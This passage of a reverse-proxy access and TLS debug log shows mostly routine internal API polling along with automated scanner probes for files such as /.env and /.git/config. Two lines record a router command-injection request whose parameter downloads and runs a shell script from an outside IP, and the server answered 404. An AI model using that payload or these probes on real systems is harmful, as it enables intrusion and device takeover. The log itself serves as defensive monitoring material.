496 "-" "-" 1074 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:15:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1075 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:15:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1076 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:16:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1077 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:16:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1078 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:17:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1079 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:17:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1080 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:17:33 +0000] "GET /console/ HTTP/1.1" 404 19 "-" "-" 1081 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:18:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1082 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:18:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1083 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:19:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1084 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:19:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1085 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:20:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1086 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:20:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1087 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:21:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1088 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:21:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1089 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:22:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1090 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:22:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1091 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:23:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1092 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:23:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1093 "api@internal" "-" 0ms +time="2024-03-30T13:23:36Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T13:23:36Z" level=debug msg="http: TLS handshake error from 10.0.0.4:28201: EOF" +10.2.0.129 - - [30/Mar/2024:13:24:05 +0000] "GET /_ignition/execute-solution HTTP/1.1" 404 19 "-" "-" 1094 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:24:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1095 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:24:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1096 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:31:14 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1097 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:35:05 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1098 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:13:36:13 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1099 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:38:49 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1100 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:13:39:56 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1101 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:39:59 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1102 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:13:40:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1103 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:40:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1104 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:41:09 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 1105 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:41:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1106 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:13:41:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1107 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:42:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1108 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:13:42:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1109 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:13:42:48 +0000] "GET /actuator/gateway/routes HTTP/1.1" 404 19 "-" "-" 1110 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:43:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1111 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:13:43:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1112 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:44:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1113 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:13:44:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1114 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:45:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1115 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:13:45:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1116 "api@internal" "-" 0ms +time="2024-03-30T13:45:50Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T13:45:50Z" level=debug msg="http: TLS handshake error from 10.0.0.4:6309: read tcp 10.2.0.36:80->10.0.0.4:6309: read: connection reset by peer" +10.0.0.4 - - [30/Mar/2024:13:46:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1117 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:13:46:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1118 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:47:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1119 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:13:47:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1120 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:48:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1121 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:13:48:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1122 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:49:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1123 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:13:49:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1124 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:50:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1125 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:13:50:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1126 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:53:06 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1127 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:14:00:57 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 1128 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:14:07:23 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1129 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:14:07:24 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1130 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:14:07:51 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1131 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:14:08:23 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1132 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:14:08:23 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1133 "api@internal" "-" 0ms +time="2024-03-30T14:15:16Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:14:15:19 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1134 "-" "-" 0ms +time="2024-03-30T14:15:20Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T14:15:20Z" level=debug msg="http: TLS handshake error from 10.2.0.129:36933: EOF" +time="2024-03-30T14:15:53Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T14:15:53Z" level=debug msg="http: TLS handshake error from 10.0.0.4:37009: EOF" +time="2024-03-30T14:16:26Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T14:16:26Z" level=debug msg="http: TLS handshake error from 10.2.1.1:16080: tls: no cipher suite supported by both client and server" +time="2024-03-30T14:16:38Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:14:16:38 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1135 "-" "-" 0ms +time="2024-03-30T14:16:39Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:14:16:39 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1136 "-" "-" 0ms +time="2024-03-30T14:16:47Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:14:16:47 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1137 "-" "-" 0ms +time="2024-03-30T14:16:47Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:14:16:48 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1138 "-" "-" 0ms +time="2024-03-30T14:17:00Z" level=debug msg="http: TLS handshake error from 10.0.0.4:6986: tls: client requested unsupported application protocols ([http/0.9 http/1.0 spdy/1 spdy/2 spdy/3 h2c hq])" +time="2024-03-30T14:17:33Z" level=debug msg="http: TLS handshake error from 10.2.1.1:32987: tls: client requested unsupported application protocols ([hq h2c spdy/3 spdy/2 spdy/1 http/1.0 http/0.9])" +time="2024-03-30T14:17:57Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:14:17:57 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1139 "-" "-" 0ms +time="2024-03-30T14:17:59Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:14:17:59 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1140 "-" "-" 0ms +time="2024-03-30T14:18:06Z" level=debug msg="http: TLS handshake error from 10.2.1.1:9565: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T14:18:39Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T14:18:40Z" level=debug msg="http: TLS handshake error from 10.2.0.129:20448: read tcp 10.2.0.36:443->10.2.0.129:20448: read: connection reset by peer" +time="2024-03-30T14:19:13Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T14:19:13Z" level=debug msg="http: TLS handshake error from 10.0.0.4:1833: EOF" +time="2024-03-30T14:19:46Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T14:19:46Z" level=debug msg="http: TLS handshake error from 10.2.1.1:35228: EOF" +time="2024-03-30T14:20:19Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T14:20:19Z" level=debug msg="http: TLS handshake error from 10.2.0.129:41724: read tcp 10.2.0.36:443->10.2.0.129:41724: read: connection reset by peer" +10.2.0.129 - - [30/Mar/2024:14:26:41 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1141 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:14:26:41 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1142 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:14:27:40 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1143 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:14:27:40 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1144 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:14:28:40 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1145 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:14:28:40 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1146 "api@internal" "-" 0ms +time="2024-03-30T14:29:31Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:14:29:32 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1147 "-" "-" 0ms +time="2024-03-30T14:29:33Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:14:29:33 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1148 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:14:32:59 +0000] "GET /geoserver HTTP/1.1" 404 19 "-" "-" 1149 "-" "-" 0ms +time="2024-03-30T14:42:10Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:14:42:13 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 19 "-" "-" 1150 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:14:42:13 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 19 "-" "-" 1151 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:14:43:21 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1152 "-" "-" 0ms +time="2024-03-30T14:46:05Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:14:46:05 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1153 "-" "-" 0ms +time="2024-03-30T14:46:05Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:14:46:06 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1154 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:14:46:08 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1155 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:14:46:08 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1156 "api@internal" "-" 0ms +time="2024-03-30T14:46:26Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T14:46:27Z" level=debug msg="http: TLS handshake error from 10.0.0.4:41087: read tcp 10.2.0.36:443->10.0.0.4:41087: read: connection reset by peer" +10.2.1.1 - - [30/Mar/2024:14:47:08 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1157 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:14:47:08 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1158 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:14:47:19 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1159 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:14:51:12 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1160 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:15:00:36 +0000] "GET /.git/config HTTP/1.1" 404 19 "-" "-" 1161 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:15:03:35 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1162 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:15:03:36 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1163 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:15:04:35 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1164 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:15:04:35 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1165 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:15:08:06 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1166 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:15:08:14 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1167 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:15:08:58 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1168 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:15:08:58 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1169 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:15:09:58 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1170 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:15:09:58 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1171 "api@internal" "-" 0ms +time="2024-03-30T15:11:33Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:15:11:34 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1172 "-" "-" 0ms +time="2024-03-30T15:11:34Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:15:11:35 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1173 "-" "-" 0ms +time="2024-03-30T15:16:44Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T15:16:45Z" level=debug msg="http: TLS handshake error from 10.0.0.4:49241: EOF" +time="2024-03-30T15:16:45Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T15:16:46Z" level=debug msg="http: TLS handshake error from 10.2.1.1:46369: EOF" +time="2024-03-30T15:16:46Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T15:16:46Z" level=debug msg="http: TLS handshake error from 10.2.0.129:22317: tls: no cipher suite supported by both client and server" +time="2024-03-30T15:16:46Z" level=debug msg="http: TLS handshake error from 10.0.0.4:42870: tls: client requested unsupported application protocols ([http/0.9 http/1.0 spdy/1 spdy/2 spdy/3 h2c hq])" +time="2024-03-30T15:16:46Z" level=debug msg="http: TLS handshake error from 10.2.1.1:1048: tls: client requested unsupported application protocols ([hq h2c spdy/3 spdy/2 spdy/1 http/1.0 http/0.9])" +time="2024-03-30T15:16:46Z" level=debug msg="http: TLS handshake error from 10.2.0.129:37758: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T15:16:46Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T15:16:47Z" level=debug msg="http: TLS handshake error from 10.0.0.4:17783: read tcp 10.2.0.36:443->10.0.0.4:17783: read: connection reset by peer" +time="2024-03-30T15:16:47Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T15:16:48Z" level=debug msg="http: TLS handshake error from 10.2.1.1:28823: EOF" +time="2024-03-30T15:16:48Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T15:16:49Z" level=debug msg="http: TLS handshake error from 10.2.0.129:53078: EOF" +time="2024-03-30T15:16:49Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T15:16:49Z" level=debug msg="http: TLS handshake error from 10.0.0.4:20318: read tcp 10.2.0.36:443->10.0.0.4:20318: read: connection reset by peer" +10.2.1.1 - - [30/Mar/2024:15:27:18 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1174 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:15:27:18 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1175 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:15:28:17 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1176 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:15:28:17 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1177 "api@internal" "-" 0ms +time="2024-03-30T15:30:26Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:15:30:27 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1178 "-" "-" 0ms +time="2024-03-30T15:30:27Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:15:30:27 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1179 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:15:37:55 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1180 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:15:40:36 +0000] "GET /.env HTTP/1.1" 404 19 "-" "-" 1181 "-" "-" 0ms +time="2024-03-30T15:40:37Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:15:40:37 +0000] "GET /.env HTTP/1.1" 404 19 "-" "-" 1182 "-" "-" 0ms +time="2024-03-30T15:43:09Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:15:43:09 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1183 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:15:46:38 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1184 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:15:46:38 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1185 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:15:47:38 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1186 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:15:47:38 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1187 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:15:50:53 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1188 "-" "-" 0ms +time="2024-03-30T15:54:03Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:15:54:04 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1189 "-" "-" 0ms +time="2024-03-30T15:54:04Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:15:54:04 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1190 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:15:57:15 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 1191 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:16:02:21 +0000] "GET /hudson HTTP/1.1" 404 19 "-" "-" 1192 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:16:06:21 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1193 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:16:06:21 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1194 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:16:07:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1195 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:16:07:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1196 "api@internal" "-" 0ms +time="2024-03-30T16:09:08Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:16:09:09 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1197 "-" "-" 0ms +time="2024-03-30T16:09:09Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:16:09:10 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1198 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:16:15:17 +0000] "GET /static/yuandong-ec9eec26.ico HTTP/1.1" 404 19 "-" "-" 1199 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:16:24:16 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1200 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:16:24:16 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1201 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:16:25:16 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1202 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:16:25:16 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1203 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:16:26:37 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 1204 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:16:27:09 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1205 "-" "-" 0ms +time="2024-03-30T16:31:33Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T16:31:33Z" level=debug msg="http: TLS handshake error from 10.0.0.4:20181: EOF" +time="2024-03-30T16:42:17Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:16:42:18 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1206 "-" "-" 0ms +time="2024-03-30T16:42:18Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:16:42:18 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1207 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:16:43:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1208 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:16:43:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1209 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:16:44:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1210 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:16:44:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1211 "api@internal" "-" 0ms +time="2024-03-30T16:51:08Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T16:51:08Z" level=debug msg="http: TLS handshake error from 10.0.0.4:1498: read tcp 10.2.0.36:443->10.0.0.4:1498: read: connection reset by peer" +time="2024-03-30T16:53:16Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:16:53:17 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1212 "-" "-" 0ms +time="2024-03-30T16:53:17Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:16:53:18 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1213 "-" 